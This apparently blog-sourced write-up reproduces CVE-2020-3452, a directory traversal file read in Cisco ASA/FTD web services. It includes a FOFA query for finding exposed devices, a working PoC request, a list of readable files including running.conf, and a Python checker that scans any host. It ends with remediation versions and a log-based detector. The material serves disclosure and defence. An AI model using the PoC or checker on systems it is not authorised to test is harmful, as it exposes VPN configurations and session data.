Cisco ASA arbitrary file read vulnerability reproduction (CVE-2020-3452)

Vulnerability description

The web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software contains a directory traversal vulnerability caused by insufficient validation of URLs in HTTP requests. An unauthenticated remote attacker can send a crafted request and read arbitrary files within the web services file system. The vulnerability cannot be used to obtain ASA or FTD system files or files of the underlying operating system (OS); only files in the web services file system are exposed, such as the WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs. The web services file system exists only when the device is configured with WebVPN or AnyConnect, so a device running a vulnerable release without either feature enabled is not exploitable; on the ASA, the command "show running-config webvpn" shows whether WebVPN is enabled on any interface.

Affected versions

The affected-version tables in the original post were images and are not reproduced here. In summary, every ASA Software release train from 9.5 and earlier through 9.14, and every FTD Software release from 6.2.2 and earlier through 6.6.0, is affected before the fixed releases listed in the remediation section below; trains without a fixed release (ASA 9.5 and earlier, ASA 9.7, FTD 6.2.2 and earlier) must be migrated to a fixed train.

Vulnerability reproduction

FOFA search keyword:
/+CSCOE+/
The PoC request is as follows:

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en


The textdomain parameter selects the file to read. Substituting one of the following names for portal_inc.lua in the request above returns that file from the +CSCOE+ web directory:

"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"
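The following checker is an added example, not code from the original post. It generalizes the PoC request above to any file name from the list, sends it over HTTPS, and classifies the response. Only check_target() touches the network; build_poc_path() and looks_like_file_read() are pure functions. The per-file-type content markers are a heuristic assumption (a successful read returns the raw file, so Lua, JavaScript, HTML or CSS syntax appears in the body), and the hostname x.x.x.x is a placeholder.

```python
# Added example, not part of the original post: a checker that generalizes the PoC
# above to any file name from the list and classifies the response. Only check_target()
# touches the network; build_poc_path() and looks_like_file_read() are pure functions.
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request

WEB_DIR = "/+CSCOE+/"
ENDPOINT = "/+CSCOT+/translation-table"

# Heuristic markers per file type. Assumption: when the read succeeds the body is the
# raw file, so Lua/JS/HTML/CSS syntax appears in it; a fixed device does not return it.
MARKERS = {
    ".lua": ("function", "--"),
    ".js": ("function", "var "),
    ".html": ("<html", "<script", "<body"),
    ".css": ("{", "}"),
}


def build_poc_path(filename: str) -> str:
    """Return the request path that reads `filename` from the +CSCOE+ web directory.

    textdomain carries the target path with '+' percent-encoded so the handler keeps it
    intact, and lang=../ steps out of the translation-table directory so the handler
    serves the textdomain file itself instead of a translation table.
    """
    if "/" in filename or "\\" in filename or filename.startswith("."):
        raise ValueError("filename must be a bare name inside the web directory")
    textdomain = urllib.parse.quote(WEB_DIR + filename, safe="/")  # '+' -> %2B
    return f"{ENDPOINT}?type=mst&textdomain={textdomain}&default-language&lang=../"


def looks_like_file_read(status: int, body: bytes, filename: str) -> bool:
    """Decide whether a response looks like the requested file was served."""
    if status != 200 or not body:
        return False
    text = body.decode("utf-8", errors="replace")
    ext = filename[filename.rfind("."):] if "." in filename else ""
    markers = MARKERS.get(ext)
    if markers is None:
        return True  # unknown file type: a non-empty 200 is the best signal we have
    return any(m in text for m in markers)


def check_target(host: str, filename: str = "portal_inc.lua", timeout: float = 10.0):
    """Send the PoC request to https://host/ and return (vulnerable, status, body).

    Certificate verification is disabled because ASA/FTD portals commonly use
    self-signed certificates. Only run this against hosts you are authorized to test.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = f"https://{host}{build_poc_path(filename)}"
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as exc:
        status, body = exc.code, exc.read()
    except OSError as exc:  # DNS failure, refused connection, timeout, TLS error
        print(f"{host}: request failed: {exc}", file=sys.stderr)
        return False, 0, b""
    return looks_like_file_read(status, body, filename), status, body


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "x.x.x.x"
    for name in ("portal_inc.lua", "logon.html", "running.conf"):
        vulnerable, status, body = check_target(target, name)
        print(f"{name}: HTTP {status}, {len(body)} bytes, vulnerable={vulnerable}")
```

Run it as "python3 checker.py <host>". A device that is fixed, or that has no WebVPN/AnyConnect configuration, will not return the file body, so the classifier reports vulnerable=False; inspect the returned body yourself before drawing conclusions from an unknown file type, where the classifier falls back to "any non-empty 200".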

Remediation

Cisco ASA Software: upgrade to the fixed release for your release train

Before 9.6: migrate to a fixed release
9.6: upgrade to 9.6.4.42
9.7: migrate to a fixed release
9.8: upgrade to 9.8.4.20
9.9: upgrade to 9.9.2.74
9.10: upgrade to 9.10.1.42
9.12: upgrade to 9.12.3.12
9.13: upgrade to 9.13.1.10
9.14: upgrade to 9.14.1.10
Cisco FTD Software: upgrade to the fixed release for your release train

6.2.2 and earlier: migrate to a fixed release
6.2.3: upgrade to 6.2.3.16
6.3.0: upgrade to 6.3.0.5 (Hot Fix), 6.3.0.6, 6.4.0.9 (Hot Fix) or 6.6.0.1
6.4.0: upgrade to 6.4.0.9 (Hot Fix) or 6.4.0.10
6.5.0: upgrade to 6.5.0.4 (Hot Fix), 6.5.0.5 or 6.6.0.1
6.6.0: upgrade to 6.6.0.1
Cisco FTD Hot Fix details:

6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5.0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_O-6.5.0.5-3.sh.REL.tar
To install a hotfix (.sh.REL.tar) or upgrade to a fixed release of Cisco FTD Software, do one of the following:

For devices managed by Cisco Firepower Management Center (FMC), install the hotfix or upgrade through the FMC interface. After the installation completes, reapply the access control policy.

For devices managed by Cisco Firepower Device Manager (FDM), install the hotfix or upgrade through the FDM interface. After the installation completes, reapply the access control policy.
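Until the upgrade is applied, exploitation attempts can be spotted in the request logs of a reverse proxy, WAF or IDS that sees traffic to the portal. The detector below is an added example, not code from the original post or from Cisco. It matches requests to the translation-table handler whose lang parameter carries a traversal or whose textdomain parameter carries a path, after repeated percent-decoding so that %2b or double-encoded %252e%252e cannot hide the payload. The log lines in SAMPLE_LOG are constructed for this example in Common Log Format; the third line is shaped like an ordinary translation-table lookup and is assumed to be benign.

```python
# Added example, not part of the original post: detection for CVE-2020-3452 exploitation
# attempts in the access logs of a reverse proxy, WAF or IDS that sees traffic to the
# ASA/FTD web portal, as a compensating control until the upgrade is applied.
# The log lines in SAMPLE_LOG are constructed for this example (Common Log Format).
import re
import urllib.parse
from typing import List, Tuple

ENDPOINT = "/+CSCOT+/translation-table"

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
198.51.100.7 - - [01/Feb/2021:10:01:02 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4192
198.51.100.7 - - [01/Feb/2021:10:01:03 +0000] "GET /%2bCSCOT%2b/translation-table?type=mst&textdomain=%2F%252bCSCOE%252b%2Frunning.conf&default-language&lang=%2e%2e%2f HTTP/1.1" 200 1523
203.0.113.9 - - [01/Feb/2021:10:02:00 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 812
203.0.113.9 - - [01/Feb/2021:10:02:01 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 9344
"""


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %2b or double-encoded %252e%252e cannot hide the payload."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_indicators(target: str) -> List[str]:
    """Return the reasons a request target looks like a translation-table file read."""
    path, _, query = target.partition("?")
    if fully_decode(path).lower() != ENDPOINT.lower():
        return []
    # parse_qs already does one round of unquote_plus, so the %2b in the exploit's
    # textdomain becomes '+' here; fully_decode catches deeper encoding.
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    reasons = []
    for value in params.get("lang", []):
        v = fully_decode(value)
        if ".." in v or "/" in v or "\\" in v:
            reasons.append(f"lang traversal: {v!r}")
    for value in params.get("textdomain", []):
        v = fully_decode(value)
        if ".." in v or "/" in v or "\\" in v:
            reasons.append(f"textdomain is a path: {v!r}")
    return reasons


def scan_log(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, request target, reasons) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = traversal_indicators(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}")
        for r in reasons:
            print(f"    {r}")
```

Matching on the decoded lang and textdomain values rather than on the literal string "../" is what catches the second sample line, where both the path and the parameters are percent-encoded a second time; a signature that looks for the exact PoC request text misses it.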

Source: blog.csdn.net/weixin_44146996/article/details/113557524